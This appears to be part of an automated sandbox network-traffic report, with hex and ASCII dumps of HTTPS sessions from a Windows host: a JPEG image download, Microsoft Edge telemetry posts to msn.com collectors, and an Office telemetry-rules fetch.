2024-11-25 23:25:56 UTC	15530	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff e1 1e a0 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 92 87 69 00 04 00 00 00 01 00 00 00 a6 00 00 00 d2 00 60 00 00 00 01 00 00 00 60 00 00 00 01 00 00 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 35 2e 32 20 28 57 69 6e 64 6f 77 73 29 00 00 32 30 32 33 3a 31 32 3a 32 39 20 30 39 3a 32 38 3a 32 36 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 07 80 a0 03 00 04 00 00 00 01 00 00 04 38 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 Data Ascii: JFIF``ExifMM*bj(1r2i``Adobe Photoshop 25.2 (Windows)2023:12:29 09:28:268
2024-11-25 23:25:56 UTC	16384	IN	Data Raw: 9d 1b 54 51 d3 ea 1b b8 12 6e f7 a2 36 a8 f7 53 b7 52 02 5d f5 2c 75 5e 36 a7 ef ac e5 b9 44 f5 27 35 5f 75 3b 75 43 24 b1 ba 88 da a1 dd ef 46 ef 7a 43 45 8a 74 6d 50 23 53 f7 53 61 62 7d f4 6f a8 37 53 b7 52 19 37 34 ed d5 0c 6d 46 ef 7a 01 a2 c6 ea 37 54 5b e8 df 40 91 3e ef 7a 7e fa 82 9d ba 81 92 a3 53 f7 55 78 da 9d bb de 80 2c 6e a7 6e f7 a8 37 d1 be a4 09 f7 7b d3 f7 d5 5d f4 fd d4 07 29 3e fa 7e ea af ba 8f 32 93 57 04 8b 1b a9 d1 b5 57 dd ef 46 ef 7a 82 8b a8 d4 f8 da a9 6f a7 c7 2d 2b 0d 3b 17 37 53 b7 7b d5 3f 32 8f 32 90 e2 5f df 46 fa a7 e6 d1 e6 d2 b1 4a 45 cd f4 6f aa 7e 6d 27 9f 45 80 d0 dd 46 ea a1 e6 d1 e6 d1 61 27 76 5f dd 4e dd 54 3c da 77 9b 45 8a dc bb ba 8f 32 a9 79 b4 bb aa 39 50 73 22 cf 9b 4d f3 6a ae fa 64 8d 57 61 97 7c da 3c Data Ascii: TQn6SR],u^6D'5_u;uC$FzCEtmP#SSab}o7SR74mFz7T[@>z~SUx,nn7{])>~2WWFzo-+;7S{?22_FJEo~m'EFa'v_NT<wE2y9Ps"MjdWa\|<
2024-11-25 23:25:57 UTC	16384	IN	Data Raw: 5a d7 56 79 74 23 15 a5 cd c7 91 1c 7f da b7 3f bb fe e7 ee db e4 f9 57 f8 11 76 d4 d3 97 b5 93 6d 5e 28 72 b4 56 fa 95 34 3d 3e 7f 16 c3 73 7b e3 2b cb bd 3a c7 4e 93 fe 7a f9 de 64 bf 79 92 35 fe 0f 96 b7 a3 b6 f0 7e a1 0c 97 5a 5d 9e 9f 1c f1 ef 8f f7 5f be 7b 07 5f 99 7f 79 27 df ff 00 c7 eb 95 d0 6f 3c 49 ad 1b 77 d5 fc 60 2c f4 a8 e3 df fd 9d 6b 77 bd e3 ff 00 66 48 ff 00 9d 76 da 55 ce 93 a8 4d 23 bd e4 3a 76 9b 6f 22 47 24 97 3f ed 7f cf 3d bf 7d bf dd 4a e4 ad 56 56 b2 b7 c8 51 8a b9 a5 06 9f 3e a1 0c 76 56 ba 6f 88 75 ad 0e de 3f 32 e6 f6 28 93 ec d7 12 c8 9f 3f c9 b0 7c a9 db ee aa fd 6a 5f ec 89 2e 34 99 27 d1 2c ee e3 8e 39 12 de db fd 2e e5 e6 b8 ba fe 1f 33 f8 d7 67 5d ad f8 d4 1e 23 b9 d4 b5 db bf ec ef 3b 56 b7 d3 7e d2 9f f2 f6 90 a4 89 Data Ascii: ZVyt#?Wvm^(rV4=>s{+:Nzdy5~Z]_{_y'o<Iw`,kwfHvUM#:vo"G$?=}JVVQ>vVou?2(?\|j_.4',9.3g]#;V~
2024-11-25 23:25:57 UTC	16384	IN	Data Raw: db a8 69 76 1f b3 9f 73 5b ed d1 d1 1e a1 1d 64 f9 94 ed df b9 a8 e5 8a 05 09 ae a6 e7 f6 94 74 df ed 38 d2 b0 7c f8 e9 d1 cf bf fe ba 53 e4 45 72 cd 1b d1 ea 11 bd 1f da 09 5c ff 00 9f 47 da a9 7b 34 24 a6 74 5f da 11 bd 1f 6e 82 b9 f8 ee 69 b2 5c d2 f6 68 5e f7 43 a5 fb 75 bd 1f da 11 d7 33 f6 9f fa 6d 4b 1d cd 1e cd 0f de 3a 58 f5 0a 7c 7a 84 75 cb fd b2 99 f6 ca 5e c9 0b 9d 9d 6f f6 82 51 f6 f8 2b 95 fb 76 cf bf 47 db a9 7b 24 3e 76 75 5f 6c 8e 9d 1d e4 75 cb c7 73 23 d1 25 cc 9f 7e 3a 9f 62 86 a5 26 75 7f 6e b7 a7 7d ba de b8 ef ed 0d f4 7d ba 4a 6a 8a 0f 6a ce c7 ed d6 f4 ff 00 ed 08 2b 8b fe d0 d9 ff 00 2d a8 fe d0 91 3e 4f 3a 97 d5 83 da b3 b4 fb 75 bf fc f6 a3 ed 90 7f cf 6a e3 63 d4 24 ff 00 9e d5 17 f6 af fd 36 a4 b0 f7 0f 6a ce df ed 90 51 f6 Data Ascii: ivs[dt8\|SEr\G{4$t_ni\h^Cu3mK:X\|zu^oQ+vG{$>vu_lus#%~:b&un}}Jjj+->O:ujc$6jQ
2024-11-25 23:25:57 UTC	16384	IN	Data Raw: df bd fe f5 41 25 8e 8b a2 69 f7 da 47 8c af 35 0d 57 55 bd bd f2 fc bb 68 92 1f b3 f9 af bb cb 78 61 dd ff 00 2c 63 8f f7 5f c3 b3 f8 7e 6a 8a 95 26 ec a2 ac 8b 8d 34 a4 ef b9 e6 9f 15 b5 2d 4b 4f f0 4c 9e 21 d0 74 ef b0 c1 73 1f d8 34 9b 78 ed 36 7d be 56 7f 29 de 35 97 f7 8f b3 6f 0e 9f 79 ab 9e fd 9a 7c 29 af e9 da e6 a5 3f 8b 75 1b bb 5b 4f 29 2e ee 74 d8 a5 ff 00 48 bb b8 8f 7f 92 92 6e f9 17 6f df f9 fe ef f7 6b d9 bc 47 67 77 16 9f 1e bd ab e8 f3 59 78 7f 4a b2 86 3b 68 ff 00 d7 79 77 12 26 e9 25 d8 ff 00 71 f6 b7 dc dd f2 75 af 32 d6 3c 63 e1 e4 f1 35 b5 d7 f6 f5 a7 fc 49 b7 c9 14 96 d1 4c f6 f6 8e c8 eb bb ca 66 58 da 4f f7 b7 7c de d5 74 ea 45 2b 5b e6 72 54 6a 9c ef 27 b1 d2 f8 8f c5 17 fa 87 da 67 bd 87 49 bd 83 cc ff 00 89 95 ed cd a3 bc 3f Data Ascii: A%iG5WUhxa,c_~j&4-KOL!ts4x6}V)5oy\|)?u[O).tHnokGgwYxJ;hyw&%qu2<c5ILfXO\|tE+[rTj'gI?
2024-11-25 23:25:57 UTC	16384	IN	Data Raw: fd 8b e1 c3 35 ec 36 f2 fe ea 49 22 f9 e7 ff 00 80 d7 b5 fc 3a be f8 83 aa f8 7e 3f 0e b6 a7 17 da b5 5b 6f b2 49 6d 2d de c8 6d d2 47 d8 ac cc 9f 75 bf 87 cb cd 61 e9 7e 33 f1 67 8f 7c 6d 6b 03 cd fd 9d a1 ff 00 69 24 72 cb 2c 49 be 46 6c 7f ac 75 fe 1e fb 17 e5 5a ed 20 b1 d2 7c 35 a8 7f 6a 6b 73 7d 8a fa f6 44 92 da 3b 69 5e 67 b8 95 7e e6 f6 4d cb bd bf ce da eb 9c 65 cd a7 c4 bb ea c5 08 a5 af 43 a0 f8 6b e1 0f 09 e9 fa 1f 9f aa 69 b7 7a 8c 7a 54 93 47 24 92 e9 fe 72 5b dc 7f 17 92 b7 1b 7c c7 6f ef 7c df ee d7 3b a9 4f 05 ef 88 24 d9 67 0c 71 e9 52 7e ee db fb 41 3f d1 d3 fe 7a 34 3b db e6 fe ef cc b5 97 f1 37 c6 da 96 85 ae 68 1a a6 a3 67 35 c4 11 c6 f1 d9 47 f3 a5 b5 a5 c7 dd 76 f2 f7 7c ed fb cf f5 8d f3 35 79 5f c5 0d 40 3f 8c 2c ed 93 53 fb 47 Data Ascii: 56I":~?[oIm-mGua~3g\|mki$r,IFluZ \|5jks}D;i^g~MeCkizzTG$r[\|o\|;O$gqR~A?z4;7hg5Gv\|5y_@?,SG
2024-11-25 23:25:57 UTC	16384	IN	Data Raw: ed ad ae 6d 1f ec 9f f7 e9 55 77 ff 00 b2 c7 f2 ae aa d7 c2 7e 25 96 f3 4d bd f1 ac d0 de ea b7 1b 3f e2 4b 2e 9f 0d e3 c7 fc 31 f9 bf 73 a7 99 c2 7e 99 ae 57 c6 9e 2c d4 bc 39 e2 1d 4b c3 49 a6 c3 a7 4f a7 48 9f da 52 58 da 43 73 34 68 df c1 fe b5 a4 ff 00 c7 be 5f 45 a8 9c 27 35 cd 15 74 cb 8c 9a d1 97 75 fd 13 42 f0 ff 00 fc 4c dc e9 f7 0f 27 fa bd 46 c6 64 d3 bc 85 64 f9 e3 df 86 7f f6 4f cb b9 ab 46 49 ec 62 d2 7f e1 28 b2 86 6f ed 29 23 4f 2e f7 57 95 26 bc 93 77 ee e3 8a 2d cf b3 fd cd ff 00 75 7f 86 a8 78 12 2f 0b ea 7a 86 ad e2 58 34 7d 3f 41 d3 63 8f ec f6 d7 be 25 89 f7 ef fb de 5d be f7 d9 e7 37 5d ee ae cb 57 7e 28 68 ba 2a 5d db 3f 89 6c f5 0d 47 4d f3 26 92 3f b0 cb f6 c9 af ff 00 db fd ef cd 6c 9f ed 7e ee 88 f3 75 bb 21 de 25 2d 73 5e f1 Data Ascii: mUw~%M?K.1s~W,9KIOHRXCs4h_E'5tuBL'FddOFIb(o)#O.W&w-ux/zX4}?Ac%]7]W~(h*]?lGM&?l~u!%-s^
2024-11-25 23:25:57 UTC	16065	IN	Data Raw: 34 eb 9f 3e 3d 16 da 27 b7 86 45 fe f4 ca fc c8 bf ec d7 57 79 a7 f8 b3 c7 5a 7e 89 0e a3 a8 cb a1 58 c7 27 fa 6e a3 75 f6 68 66 9e 26 fb 9b 22 6d d2 7d ef fc 77 fd aa 86 4d 33 c5 9a 54 d6 d6 5a 24 d6 9a 8c 7f eb 3f b4 a2 96 1b 6f b7 a2 ff 00 b5 2e d6 d9 fe f7 de ae 3a d5 2a a4 95 36 9b eb db d0 d6 d1 72 b9 46 78 ad 13 c7 92 7f 64 7d ae cb 46 8e 4f f8 99 6a 52 ea 1f 66 7b f9 5b e6 f9 5f fb a9 ff 00 4c ff 00 8a b2 27 9f 45 69 a3 ba 92 ce d2 4b 5b d9 3c f9 6d ac 75 6f 92 de dd be e7 da 2f a5 fd e3 7f e3 ad 57 ed 67 8d fc 4d a4 eb 7f 10 fc 61 a8 6b da ad 96 fb 8b 6b 2b ef f4 cb 1b 7f e2 fd eb c3 f2 ff 00 c0 2b a3 f1 36 99 a9 78 d7 ec 5a 24 fa f6 9f 1e 95 65 24 da 9c 9a 4c b6 8e f3 7c df f3 dd be 65 87 6a fd c8 fe fa 7f 76 ae 32 54 dd a7 2e 9f 91 5c ad 2d 11 Data Ascii: 4>='EWyZ~X'nuhf&"m}wM3TZ$?o.:*6rFxd}FOjRf{[_L'EiK[<muo/WgMakk++6xZ$e$L\|ejv2T.\-
2024-11-25 23:25:57 UTC	16384	IN	Data Raw: 61 f1 34 93 de 48 92 5b 6a df 3d dd f5 fc bf 27 98 af e7 a4 66 24 4f bb bf f8 bf 86 bd 07 8c 8c e0 d4 63 a7 de 67 4e 0e ea 57 37 ae 35 5d 15 34 f9 3e c3 e3 69 b5 59 24 b9 f2 ed a5 96 24 b7 86 d3 fb fb 61 f2 95 9d bf e9 a3 7f f6 35 cf eb 13 f8 32 df c1 12 ea fa a5 e5 de b5 a6 db c8 f2 5b 69 32 ef 4f b5 cb 1f fe 84 bb 9f b7 cb f7 8d 6b 78 b6 c6 c3 c0 fa b4 53 78 87 58 d4 34 ef b3 fe fe e6 db ca 49 be d1 17 de f2 ff 00 78 65 8f e8 9b 5b f3 ae 16 0b cd 5b c5 5e 2c fb 57 fc 21 33 6b 5a 55 c4 6f 1c 77 37 32 bb cd b3 fe 59 6e d9 b1 36 ab 7f 06 cd b5 cd 45 c6 5b 46 d6 d7 b1 d1 2b bd 6e 8e ba c7 e3 5c 1a 94 32 6a fa de 9b 0d c5 8e 95 a0 3f f6 2d 96 91 a7 be 9d 6d 71 7a cf e5 c2 b2 32 11 bf cb 5f f6 6b cd 34 0d 72 df 50 d4 6e 6e af 6c f4 99 24 b7 d9 e6 5e cb 16 cb Data Ascii: a4H[j='f$OcgNW75]4>iY$$a52[i2OkxSxX4Ixe[[^,W!3kZUow72Yn6E[F+n\2j?-mqz2_k4rPnnl$^
2024-11-25 23:25:57 UTC	16384	IN	Data Raw: 6b 88 97 ee 22 49 f7 d3 dd 2b a5 f8 1f f0 ce fd f5 6f f8 49 35 e9 ae ed e3 fb 4f d9 ed ae 6f bf 73 f2 fc ea 89 bd d5 d7 fe f9 dc de 95 dd 6a da 66 85 a7 f8 9a e6 f7 48 f1 24 3f da b2 7f c7 ee b5 16 9e 9b 34 c8 97 ef ac 7f ed 7f b4 e5 64 a8 ad 2a 70 9f b8 ef fa 13 14 e4 9f 31 e4 16 be 0c f1 f7 83 35 68 ae a7 d3 6d 34 67 8f fd 5d 95 cd a7 9d 37 dc f9 5f ec 9f 33 7f c0 9f f3 ad 3d 4b fb 5b 4c f0 f5 b6 a3 06 b1 ab 7e ee 4f 32 f7 ed db 21 87 fe b8 79 2a d9 6f ef 1d b5 df e9 ab ad 5c 78 b2 e6 7d 3b fe 12 c8 e0 bd 8f fd 27 56 b9 d3 ec d3 cc 8b f8 7e e6 26 8f d9 77 d1 7d a2 e8 d6 9e 66 97 6b 34 da 75 f7 97 e7 ea 52 7f 6b 27 da 60 b7 fb ff 00 be fb b1 c5 ff 00 7d 7f bd bd a8 f6 ab 9d 39 25 76 52 8a 71 7d 8f 17 d3 be 23 f8 d2 c7 5c 8d ed 75 8d 6e f6 d6 49 3c cf b3 Data Ascii: k"I+oI5OosjfH$?4dp15hm4g]7_3=K[L~O2!yo\x};'V~&w}fk4uRk'`}9%vRq}#\unI<

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
144	192.168.2.6	49934	51.104.15.253	443	1916	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:56 UTC	1044	OUT	POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1732577153624&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1 Host: browser.events.data.msn.com Connection: keep-alive Content-Length: 11547 sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55 Content-Type: text/plain;charset=UTF-8 Accept: / Origin: https://ntp.msn.com Sec-Fetch-Site: same-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: USRLOC=; MUID=0675AFABBF8562701E27BAE9BE8263C5; _EDGE_S=F=1&SID=289DED71267C6C8C1A3EF83327A06D4B; _EDGE_V=1; _C_ETH=1; msnup=
2024-11-25 23:25:56 UTC	11547	OUT	Data Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 31 2d 32 35 54 32 33 3a 32 35 3a 35 33 2e 36 32 33 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 32 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 62 38 33 61 37 61 62 31 2d 35 63 61 37 2d 34 62 36 31 2d 39 66 36 64 2d 38 33 30 63 62 61 61 61 33 38 34 63 22 2c 22 65 70 6f 63 68 22 3a 22 32 30 37 38 38 37 33 38 31 37 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-11-25T23:25:53.623Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":2,"installId":"b83a7ab1-5ca7-4b61-9f6d-830cbaaa384c","epoch":"2078873817"},"app":{"locale
2024-11-25 23:25:56 UTC	890	IN	HTTP/1.1 204 No Content Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Strict-Transport-Security: max-age=31536000 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: MC1=GUID=731bcfa0174d4aa0a4cc882878640e34&HASH=731b&LV=202411&V=4&LU=1732577156622; Domain=.microsoft.com; Expires=Tue, 25 Nov 2025 23:25:56 GMT; Path=/;Secure; SameSite=None Set-Cookie: MS0=7e483977465e48ae90a388956d59cbda; Domain=.microsoft.com; Expires=Mon, 25 Nov 2024 23:55:56 GMT; Path=/;Secure; SameSite=None time-delta-millis: 2998 Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis Access-Control-Allow-Methods: POST Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: https://ntp.msn.com Access-Control-Expose-Headers: time-delta-millis Date: Mon, 25 Nov 2024 23:25:56 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
145	192.168.2.6	49936	51.104.15.253	443	1916	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:56 UTC	1043	OUT	POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1732577153628&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1 Host: browser.events.data.msn.com Connection: keep-alive Content-Length: 5004 sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55 Content-Type: text/plain;charset=UTF-8 Accept: / Origin: https://ntp.msn.com Sec-Fetch-Site: same-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: USRLOC=; MUID=0675AFABBF8562701E27BAE9BE8263C5; _EDGE_S=F=1&SID=289DED71267C6C8C1A3EF83327A06D4B; _EDGE_V=1; _C_ETH=1; msnup=
2024-11-25 23:25:56 UTC	5004	OUT	Data Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 31 2d 32 35 54 32 33 3a 32 35 3a 35 33 2e 36 32 37 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 33 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 62 38 33 61 37 61 62 31 2d 35 63 61 37 2d 34 62 36 31 2d 39 66 36 64 2d 38 33 30 63 62 61 61 61 33 38 34 63 22 2c 22 65 70 6f 63 68 22 3a 22 32 30 37 38 38 37 33 38 31 37 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-11-25T23:25:53.627Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":3,"installId":"b83a7ab1-5ca7-4b61-9f6d-830cbaaa384c","epoch":"2078873817"},"app":{"locale
2024-11-25 23:25:57 UTC	890	IN	HTTP/1.1 204 No Content Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Strict-Transport-Security: max-age=31536000 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: MC1=GUID=5105e965278b43458dddfc7c113453a6&HASH=5105&LV=202411&V=4&LU=1732577156952; Domain=.microsoft.com; Expires=Tue, 25 Nov 2025 23:25:56 GMT; Path=/;Secure; SameSite=None Set-Cookie: MS0=37fa67f3ef7d459c91c6955d696a2678; Domain=.microsoft.com; Expires=Mon, 25 Nov 2024 23:55:56 GMT; Path=/;Secure; SameSite=None time-delta-millis: 3324 Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis Access-Control-Allow-Methods: POST Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: https://ntp.msn.com Access-Control-Expose-Headers: time-delta-millis Date: Mon, 25 Nov 2024 23:25:56 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
146	192.168.2.6	49937	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:57 UTC	192	OUT	GET /rules/rule120682v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 23:25:57 UTC	498	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:57 GMT Content-Type: text/xml Content-Length: 501 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT ETag: "0x8DC582BACFDAACD" x-ms-request-id: f418fe9b-801e-0047-5281-3f7265000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T232557Z-174f7845968g6hv8hC1EWR1v2n00000002m00000000002su x-fd-int-roxy-purgeid: 0 X-Cache-Info: L2_T2 X-Cache: TCP_REMOTE_HIT Accept-Ranges: bytes
2024-11-25 23:25:57 UTC	501	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
147	192.168.2.6	49938	51.104.15.253	443	1916	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:57 UTC	1033	OUT	POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1732577154567&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1 Host: browser.events.data.msn.com Connection: keep-alive Content-Length: 5202 sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55 Content-Type: text/plain;charset=UTF-8 Accept: / Origin: https://ntp.msn.com Sec-Fetch-Site: same-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: USRLOC=; MUID=0675AFABBF8562701E27BAE9BE8263C5; _EDGE_S=F=1&SID=289DED71267C6C8C1A3EF83327A06D4B; _EDGE_V=1; msnup=
2024-11-25 23:25:57 UTC	5202	OUT	Data Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 31 2d 32 35 54 32 33 3a 32 35 3a 35 34 2e 35 36 33 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 34 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 62 38 33 61 37 61 62 31 2d 35 63 61 37 2d 34 62 36 31 2d 39 66 36 64 2d 38 33 30 63 62 61 61 61 33 38 34 63 22 2c 22 65 70 6f 63 68 22 3a 22 32 30 37 38 38 37 33 38 31 37 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-11-25T23:25:54.563Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":4,"installId":"b83a7ab1-5ca7-4b61-9f6d-830cbaaa384c","epoch":"2078873817"},"app":{"locale
2024-11-25 23:25:57 UTC	890	IN	HTTP/1.1 204 No Content Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Strict-Transport-Security: max-age=31536000 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: MC1=GUID=84ce9bf3bcd84408b861a9656c50b2ae&HASH=84ce&LV=202411&V=4&LU=1732577157558; Domain=.microsoft.com; Expires=Tue, 25 Nov 2025 23:25:57 GMT; Path=/;Secure; SameSite=None Set-Cookie: MS0=c62dedbf54f44492ab430ba34204f49c; Domain=.microsoft.com; Expires=Mon, 25 Nov 2024 23:55:57 GMT; Path=/;Secure; SameSite=None time-delta-millis: 2991 Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis Access-Control-Allow-Methods: POST Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: https://ntp.msn.com Access-Control-Expose-Headers: time-delta-millis Date: Mon, 25 Nov 2024 23:25:56 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
148	192.168.2.6	49939	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
